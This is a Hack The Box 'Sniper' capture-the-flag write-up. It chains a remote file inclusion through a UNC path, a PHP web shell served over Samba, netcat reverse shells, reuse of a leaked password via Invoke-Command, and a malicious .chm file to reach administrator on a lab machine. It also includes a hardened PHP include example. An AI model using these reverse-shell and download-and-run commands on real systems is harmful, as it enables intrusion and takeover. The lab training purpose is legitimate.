Hack the box(HTB) Sniper write up


Steps

  1. Nmap scan
  2. Finding RFI
  3. Setting up Samba server
  4. Getting reverse shell
  5. Privilege escalation (Getting user.txt)
  6. Basic enumeration
  7. Making malicious .chm file
  8. Getting the reverse shell (Getting root.txt)

Commands used

  1. nmap -sC -sV -oV 10.10.10.151
  2. nano /etc/samba/smb.conf
  3. service smbd start
  4. nc.exe 10.10.14.39 4444 -e cmd.exe
  5. powershell
  6. $username = 'SNIPER\Chris'
  7. $password = '36mEAhz/B8xQ~2VM'
  8. $securePassword = ConvertTo-SecureString $password -AsPlainText -Force
  9. $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
  10. Invoke-command -computername SNIPER -credential $credential -scriptblock { cmd.exe /c "C:\tmp\nc.exe" -e powershell 10.10.14.39 1234 }
  11. import-module .\Out-CHM.ps1; Out-CHM -Payload "C:\tmp\nc.exe -e powershell 10.10.14.39 8888" -HHCPath "C:\Program Files (x86)\HTML Help Workshop" (run locally, on a Windows box)

NMAP Scan

Nmap 7.70 scan initiated Wed Feb  5 09:25:46 2020 as: nmap -sC -sV -oV 10.10.10.151
Nmap scan report for 10.10.10.151
Host is up (0.64s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Sniper Co.
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
| date: 2020-02-05 16:28:18
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done at Wed Feb 5 09:28:53 2020 -- 1 IP address (1 host up) scanned in 186.70 seconds

Finding RFI

Port 80 is open, so let's see what is on the website.


After enumerating further I found a file inclusion (RFI, remote file inclusion) in the blog at /blog, reached through its language parameter.


Changing the language shows the included file name directly in the URL, so that was the initial foothold:

http://10.10.10.151/blog/?lang=blog-en.php

The value goes straight into a PHP include. Because the target is Windows, a UNC path (\\host\share\file.php) is accepted as well: PHP reads it over SMB and executes it, and this works even with allow_url_include turned off, since that setting only covers the http:// and ftp:// stream wrappers, not plain file paths.
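As an added example (this is not code from the write-up or from the Sniper site; it reconstructs the behaviour the lang parameter implies), here is the vulnerable include pattern beside a hardened version. The helper names, the allowlist keys and any language file other than blog-en.php are assumptions.

```php
<?php
// Added example: reconstructs the behaviour seen at /blog/?lang=..., not the site's own code.

// VULNERABLE: the request value is used directly as the include path.
// On Windows a UNC path such as \\10.10.14.39\public\mannu.php is read over SMB
// and executed, and allow_url_include=Off does not stop it: that setting only
// gates the http:// and ftp:// stream wrappers, not plain file paths.
function include_lang_vulnerable(string $lang): void
{
    include $lang;
}

// HARDENED: the request value is only ever a key into a fixed allowlist and
// the include path is built server-side from that key.
const LANG_FILES = [
    'en' => 'blog-en.php',
    // assumption: extra languages would be listed here, e.g. 'fr' => 'blog-fr.php'
];

// $lang is left untyped on purpose: ?lang[]=x arrives as an array, and a string
// type hint would turn that into a TypeError instead of a clean fallback.
function resolve_lang($lang): string
{
    if (!is_string($lang) || !array_key_exists($lang, LANG_FILES)) {
        return LANG_FILES['en'];   // unknown, missing or non-string value falls back to the default
    }
    return LANG_FILES[$lang];
}

function include_lang_hardened($lang): void
{
    $path = __DIR__ . DIRECTORY_SEPARATOR . resolve_lang($lang);
    $real = realpath($path);
    $base = realpath(__DIR__) . DIRECTORY_SEPARATOR;
    // Defence in depth: refuse anything that does not resolve to a file inside this directory.
    if ($real === false || strncmp($real, $base, strlen($base)) !== 0) {
        http_response_code(400);
        exit;
    }
    include $real;
}

// Entry point: the parameter value comes from the query string.
// /blog/?lang=en                           -> includes blog-en.php
// /blog/?lang=\\10.10.14.39\public\x.php   -> falls back to blog-en.php, nothing is fetched over SMB
include_lang_hardened($_GET['lang'] ?? null);
```

With this version the parameter becomes a language code rather than a file name, so the attacker-controlled string never reaches include(). As an additional server-side restriction, an open_basedir setting covering only the web root would make PHP refuse the UNC include regardless of the application code.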

So now it was time to get a shell. For this I used a ready-made PHP shell:

https://github.com/incredibleindishell/Mannu-Shell/blob/master/mannu.php

All credit goes to the author of the script; I used it because it is easy to use.

Another method is to write our own .php file and serve it from our Samba server.

Setting up Samba server

So our first step is to configure the Samba server.

Edit smb.conf:

nano /etc/samba/smb.conf

Here is my smb.conf

# cat /etc/samba/smb.conf
[global]
security = user
map to guest = bad user
bind interfaces only = yes
encrypt passwords = yes
name resolve order = bcast host
workgroup = WORKGROUP
winbind use default domain = yes
dns proxy = no
server string = Samba Server %v
winbind trusted domains only = yes
null passwords = yes
netbios name = indishell-lab
[public]
force user = nobody
path = /root/Desktop
public = yes
writeable = yes
directory mask = 0755
create mask = 0644
browseable = yes

Now we can start our Samba server.

# service smbd start

The share path in the .conf file is /root/Desktop, so the file to include must be on the Desktop. First let's do it with mannu.php from indishell (linked above).

The share name in my .conf file is public, so don't get confused: it is the share name, not the directory name, that goes in the UNC path.

Two caveats: the share is guest-accessible and writable for anyone who can reach your box on the VPN, so a dedicated directory with read only = yes is enough (PHP only needs to read the file) and smbd should be stopped when you are done; and if the include comes back empty on the target, check that the forced user (nobody) can actually traverse and read the share path.

Getting reverse shell

http://10.10.10.151/blog/?lang=\10.10.14.39\public\mannu.php
http://10.10.10.151/blog/?lang=\local_ip\share_name\file_name

Now we can create a tmp directory (C:\tmp) and upload nc.exe through the shell; its usage is simple enough to follow.

Now let's get a reverse shell: start a listener on port 4444 and run nc.exe 10.10.14.39 4444 -e cmd.exe from the web shell.

And we got a reverse shell.

We can also do it with our own .php file on the share, with nc.exe served over HTTP from our machine on port 8000 (for example with python3 -m http.server 8000 in the directory holding nc.exe) and a listener on port 4444:

<?php shell_exec('powershell iwr -uri http://10.10.14.39:8000/nc.exe -o C:\Windows\Temp\nc.exe; C:\Windows\Temp\nc.exe -e powershell 10.10.14.39 4444') ?>

This downloads nc.exe to C:\Windows\Temp and sends a reverse shell back to our machine.

After some enumeration I found db.php, which contained credentials for Chris.


Privilege escalation (Getting user.txt)

So now it's time to move to the chris user, using the credentials from db.php with Invoke-Command from our existing shell:

$username = 'SNIPER\Chris'
$password = '36mEAhz/B8xQ~2VM'
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
Invoke-command -computername SNIPER -credential $credential -scriptblock { cmd.exe /c "C:\tmp\nc.exe" -e powershell 10.10.14.39 1234 }

So now we have a shell as chris, and with it the user flag.


Basic enumeration

After some enumeration I found instructions.chm in Chris's Downloads folder and a note.txt in C:\Docs.

PS C:\users\chris\Downloads> ls
ls

    Directory: C:\users\chris\Downloads

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        4/11/2019   8:36 AM          10462 instructions.chm

PS C:\users\chris\Downloads>
PS C:\> cd Docs
cd Docs
PS C:\Docs> ls
ls

    Directory: C:\Docs

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        4/11/2019   9:31 AM            285 note.txt
-a----        4/11/2019   9:17 AM         552607 php for dummies-trial.pdf

PS C:\Docs> cat note.txt
cat note.txt
Hi Chris,
Your php skillz suck. Contact yamitenshi so that he teaches you how to use it and after that fix the website as there are a lot of bugs on it. And I hope that you've prepared the documentation for our new app. Drop it here when you're done with it.
Regards,
Sniper CEO.
PS C:\Docs>

That is enough to work out that Chris's boss is expecting the documentation as a .chm file (like the instructions.chm in Chris's Downloads) to be dropped in C:\Docs, and that he will open it.

So we can make a malicious .chm, drop it in C:\Docs, and when the boss opens it we get a shell as administrator.

Making malicious .chm file

I used Out-CHM.ps1 from nishang: https://github.com/samratashok/nishang/blob/master/Client/Out-CHM.ps1

The .chm has to be compiled on a Windows box with HTML Help Workshop installed, since Out-CHM calls its hhc.exe compiler; the -HHCPath argument points at the install directory.

Once we have downloaded it we can create the malicious .chm (run locally, on the Windows box):

import-module .\Out-CHM.ps1; Out-CHM -Payload "C:\tmp\nc.exe -e powershell 10.10.14.39 8888" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"

The payload runs on the target when the file is opened, so it must reference paths that exist there: C:\tmp\nc.exe is the netcat we uploaded earlier.

Getting the reverse shell (Getting root.txt)

Now we just have to copy the .chm into C:\Docs, with a listener waiting on port 8888:

# nc -nlvp 8888
listening on [any] 8888 ...
connect to [10.10.14.39] from (UNKNOWN) [10.10.10.151] 49959
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> whoami
whoami
sniper\administrator
PS C:\Windows\system32>
So now we have a shell as administrator.

PS C:\users\Administrator\Desktop> cat root.txt
cat root.txt
5624***c15
PS C:\users\Administrator\Desktop>
